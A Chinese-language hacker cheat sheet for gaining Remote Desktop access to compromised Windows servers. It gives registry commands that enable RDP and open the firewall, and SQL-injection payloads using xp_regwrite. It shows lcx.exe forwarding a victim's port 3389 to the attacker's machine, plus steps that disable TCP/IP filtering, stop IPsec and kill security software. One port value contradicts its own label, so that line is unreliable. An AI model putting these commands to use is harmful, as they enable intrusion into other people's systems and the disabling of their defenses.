windows 3389 远程
3389常用命令:
1.查询终端端口
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2.查看终端一技巧
其实 可以首先可以 使用命令 tasklist /svc 查看, 找到服务名称为 Terms service 所对应的 ID, 在使用命令 netstat -ano
3.开启3389终端
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
4.更改端口为2008:(0x7d8)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0xd3d /f
5.取消系统防火墙对终端服务的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
6.解决终端超出了最大连接数的命令
mstsc /v:219.232.233.155 /console
7.MSSQL开启关闭3389方法:
开启3389的SQL语句:
xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD','0'
id=100;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
关闭3389的SQL语句:
id=100;exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',1;--
开了3389我们却无法连接:
1:服务器在内网。
lcx.exe转发:
黑客本地:lcx.exe -listen 80 3389
肉鸡:lcx.exe -listen 黑客本地IP 80 肉鸡IP 3389
2:做了tcp/ip筛选。
cmd命令:
cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip #导出注册表里关于TCP/IP筛选的第一处
cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip #导出注册表里关于TCP/IP筛选的第二处
cmd /c regedit -e c:\3.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip #导出注册表里关于TCP/IP筛选的第三处 然后回到c盘1.reg,2.reg,3.reg
把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下,找到EnableSecurityFilters这个字段看看dword后面的键值是否为00000000,如果为00000001就说明管理员做了tcp/ip筛选, 我们只要把1改成0就行了,2.reg和3.reg一样的改。
3:做了ip安全策略。
执行cmd命令: cmd /c net stop policyagent 将IPSEC Services服务停了它。再连3389。
.上传mt.exe到目标服务器可执行目录
执行命令:mt.exe -filter off(关闭TCP/IP策略)
4:防火墙。 安全狗。安全软件...
杀掉防火墙,安全够,等安全软件进程....
